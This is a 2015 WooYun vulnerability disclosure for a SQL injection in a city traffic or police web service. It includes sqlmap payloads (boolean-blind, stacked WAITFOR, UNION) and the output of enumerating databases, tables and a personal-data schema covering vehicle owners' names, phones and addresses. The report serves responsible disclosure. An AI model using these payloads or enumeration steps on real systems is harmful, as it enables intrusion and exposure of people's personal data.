当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151008

漏洞标题:某市敏感部门SQL注入漏洞可UNION(泄露百万信息)

相关厂商:公安部一所

漏洞作者: 花式

提交时间:2015-11-02 14:23

修复时间:2015-12-17 14:58

公开时间:2015-12-17 14:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-02: 细节已通知厂商并且等待厂商处理中
2015-11-02: 厂商已经确认,细节仅向厂商公开
2015-11-12: 细节向核心白帽子及相关领域专家公开
2015-11-22: 细节向普通白帽子公开
2015-12-02: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

某市敏感部门SQL注入漏洞可UNION(泄露百万信息)

详细说明:

http://**.**.**.**/wsyb/Input.aspx?id=9


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=9 AND 1466=1466
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=9;WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-9513 UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(73)+CH
AR(68)+CHAR(73)+CHAR(76)+CHAR(106)+CHAR(105)+CHAR(114)+CHAR(118)+CHAR(78)+CHAR(88)+CHAR(113)+CHAR(10
6)+CHAR(98)+CHAR(113)+CHAR(113),NULL,NULL--
---
[10:54:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
[10:54:41] [INFO] fetching database names
[10:54:41] [INFO] the SQL query used returns 9 entries
[10:54:41] [INFO] resumed: "CarMS"
[10:54:41] [INFO] resumed: "CMCC"
[10:54:41] [INFO] resumed: "dnt"
[10:54:41] [INFO] resumed: "master"
[10:54:41] [INFO] resumed: "model"
[10:54:41] [INFO] resumed: "msdb"
[10:54:41] [INFO] resumed: "search"
[10:54:41] [INFO] resumed: "tempdb"
[10:54:41] [INFO] resumed: "WSCGS"
available databases [9]:
[*] CarMS
[*] CMCC
[*] dnt
[*] master
[*] model
[*] msdb
[*] search
[*] tempdb
[*] WSCGS

漏洞证明:

Database: WSCGS
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| dbo.tbl_GZ_YSWD_JDC | 375190 |
| dbo.tbl_GZ_YSWD_JDC | 375190 |
| dbo.tbl_GZ_YSWD_JSZ | 256892 |
| dbo.SMS_RECORD | 55187 |
| dbo.WEIXIN_SUBSCRIBE | 31360 |
| dbo.tbl_B_Mf_ry | 11466 |
| dbo.tbl_JSZ | 9269 |
| dbo.tbl_HPHM | 6191 |
| dbo.DICTS | 3557 |
| dbo.View_Send | 2470 |
| dbo.Yk_Ksjh | 1651 |
| dbo.Yk_Xyxx | 1287 |
| dbo.solartermday | 365 |
| dbo.YY_JJR | 335 |
| dbo.LunisolarDatas | 201 |
| dbo.tbl_Content | 183 |
| dbo.Yk_School | 46 |
| dbo.tbl_Placard | 28 |
| dbo.LunisolarSolarTerm | 24 |
| dbo.tbl_BusinessType | 16 |
| dbo.tbl_Column | 12 |
| dbo.tbl_B_Mf_xq | 10 |
| dbo.tbl_BusinessDict | 10 |
| dbo.tbl_BusinessYFDJ | 9 |
| dbo.CHAT_RECORDDict | 8 |
| dbo.CHAT_RECORDDict | 8 |
| dbo.SMS_TESTSJHM | 7 |
| dbo.tbl_Master | 7 |
| dbo.tbl_JsFile | 6 |
| dbo.tbl_UserGroup | 4 |
| dbo.tbl_UserGroup | 4 |
| dbo.tbl_Ip2 | 3 |
| dbo.tbl_Ip2 | 3 |
| dbo.tbl_MyFavorites | 3 |
| dbo.tbl_Jkcx | 2 |
| dbo.SMS_BLACKLIST | 1 |
| dbo.tbl_ArticleTemplate | 1 |
| dbo.tbl_B_Mf_Jh | 1 |
| dbo.tbl_FriendLink | 1 |
| dbo.tbl_System | 1 |
| dbo.tbl_Template | 1 |
| dbo.Yk_Dcjl | 1 |
| dbo.Yk_LS | 1 |
+----------------------<code>
<code>Database: WSCGS
Table: tbl_GZ_YSWD_JDC
[12 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| SJ | datetime |
| 关联日期 | datetime |
| 号牌号码 | varchar |
| 号牌种类 | varchar |
| 告知编号 | varchar |
| 序号 | varchar |
| 所有人 | varchar |
| 手机号码 | varchar |
| 服务代码 | varchar |
| 服务内容 | varchar |
| 服务名称 | varchar |
| 邮寄地址 | varchar |
+--------+----------+


三个表中都是人员数据!!

修复方案:

版权声明:转载请注明来源 花式@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-11-02 14:57

厂商回复:

非常感谢!
你提交的漏洞已验证,会尽快修复。

最新状态:

暂无


漏洞评价:

评价